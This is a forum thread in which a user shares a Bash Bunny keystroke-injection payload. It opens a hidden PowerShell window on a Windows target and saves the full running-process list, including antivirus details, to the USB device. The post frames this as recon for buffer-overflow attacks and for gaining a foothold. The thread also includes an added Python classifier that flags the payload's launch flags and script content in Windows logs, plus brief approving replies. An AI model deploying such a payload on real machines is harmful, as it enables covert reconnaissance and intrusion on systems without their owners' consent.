Decoy, Posted April 1, 2017 (edited)

This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows, and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system.

An example of useful process info:

```text
Name           : avpui
Id             : 724
PriorityClass  : Normal
FileVersion    : 17.0.0.643
Path           : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe
Company        : AO Kaspersky Lab
CPU            : 85.875
ProductVersion : 17.0.0.643
Description    : Kaspersky Anti-Virus
Product        : Kaspersky Anti-Virus
```

https://github.com/DeeKoy/bashbunny-payloads/tree/master/payloads/library/ProcessInfo

```bash
#!/bin/bash
#
# Title: Process Info
# Author: Decoy
# Version: 1.0
# Category: Recon
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, Storage
#
#
# Amber Blink Fast.....Initialization
# Amber................Begin
# White Blinking.......Moving loot to mass storage
# Blue Blinking........Syncing File System
# Green................Finished

# Initialization
LED R G 100

# Create loot directory
mkdir -p /root/udisk/loot/ProcessInfo

# Runs minimized powershell gathering process information for potential future attack vectors
LED R G
ATTACKMODE HID STORAGE
QUACK DELAY 6000
QUACK GUI r
QUACK STRING "powershell -NoP -NonI -W Hidden"
QUACK ENTER
QUACK DELAY 1000
# \$ and \" are escaped for bash; the typed text is: $Bunny = (gwmi win32_volume -f 'label="BashBunny"' ...)
# \\ types a single backslash, so the loot path becomes $Bunny\loot\ProcessInfo\ProcessInfo.txt
QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
QUACK ENTER
LED R G B 100
sleep 1

# Sync File System
LED B 100
sync; sleep 1; sync

# Trap is clean
LED G
```

Edited April 1, 2017 by Decoy
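From the defender's side, the payload above leaves two distinct traces: the launch line typed into the Run dialog (visible in process-creation logging) and the one-liner typed into the hidden shell (visible only in PowerShell script-block logging). The following is an added example, not code from the post or the payload repo: a small classifier that tags both traces, run over constructed events flattened to dicts (the 4688/4104 ids are the standard Windows process-creation and script-block event ids; the field layout is assumed, not a real export).

```python
"""Classify log events for the hidden-PowerShell recon pattern discussed above.
Added example (not from the post or the payload repo); the events below are
constructed, flattened to dicts rather than real EVTX/Sysmon records."""
import re

# The payload types short switch forms (-NoP -NonI -W Hidden); PowerShell accepts
# any unambiguous prefix, so match both the short and the full spellings.
HIDDEN_LAUNCH = [
    (re.compile(r"-nop(rofile)?\b", re.I), "no-profile"),
    (re.compile(r"-noni(nteractive)?\b", re.I), "non-interactive"),
    (re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), "hidden-window"),
]
# Script-block content characteristic of the one-liner: find a volume by its
# label, enumerate processes, write the result under a \loot\ folder.
BUNNY_CONTENT = [
    (re.compile(r"win32_volume", re.I), "wmi-volume-lookup"),
    (re.compile(r"label\s*=\s*[\"']?bashbunny", re.I), "bashbunny-label"),
    (re.compile(r"get-process", re.I), "process-enumeration"),
    (re.compile(r"\\loot\\", re.I), "loot-path"),
]

SAMPLE_EVENTS = [
    # Constructed: an ordinary interactive shell, launch line only.
    {"id": 4688, "text": "powershell.exe"},
    # Constructed: process creation (4688) with the launch line the payload types.
    {"id": 4688, "text": "powershell -NoP -NonI -W Hidden"},
    # Constructed: script-block logging (4104) for the one-liner typed next; the
    # launch flags never appear here, only the script content does.
    {"id": 4104, "text": r"""$Bunny = (gwmi win32_volume -f 'label="BashBunny"' | """
                         r"""Select-Object -ExpandProperty DriveLetter); Get-Process | """
                         r"""Format-List -Property * | Out-File $Bunny\loot\ProcessInfo\ProcessInfo.txt; exit"""},
]

def classify(event):
    """Tag one event with the indicators it matches and an overall verdict."""
    text = event["text"]
    launch = [tag for rx, tag in HIDDEN_LAUNCH if rx.search(text)]
    content = [tag for rx, tag in BUNNY_CONTENT if rx.search(text)]
    if len(launch) == 3:      # all three switches together is the payload's launch line
        verdict = "hidden-noninteractive-launch"
    elif len(content) >= 2:   # volume-by-label plus process dump / loot path
        verdict = "removable-media-recon"
    else:
        verdict = "benign"
    return {"id": event["id"], "verdict": verdict, "indicators": launch + content}

def triage(events):
    """Return only the events worth an analyst's attention, in input order."""
    return [r for r in map(classify, events) if r["verdict"] != "benign"]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Script-block logging has to be enabled for the 4104 trace to exist at all; without it only the launch line is visible, which is why the two checks are kept separate.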
Dave-ee Jones, Posted April 1, 2017

Simple but effective. Utilising simple powershell commands and functions is definitely one of the best things about Ducky script...
Decoy (Author), Posted April 1, 2017

> 6 hours ago, Dave-ee Jones said: Simple but effective. Utilising simple powershell commands and functions is definitely one of the best things about Ducky script...

Yeah, I really didn't start playing around with or learning PowerShell until I got my Rubber Ducky. Easy to learn, and extremely effective.
Dave-ee Jones, Posted April 3, 2017

> On 4/2/2017 at 0:45 AM, Decoy said: Yeah, I really didn't start playing around with or learning PowerShell until I got my Rubber Ducky. Easy to learn, and extremely effective.

Me too, except with my BB.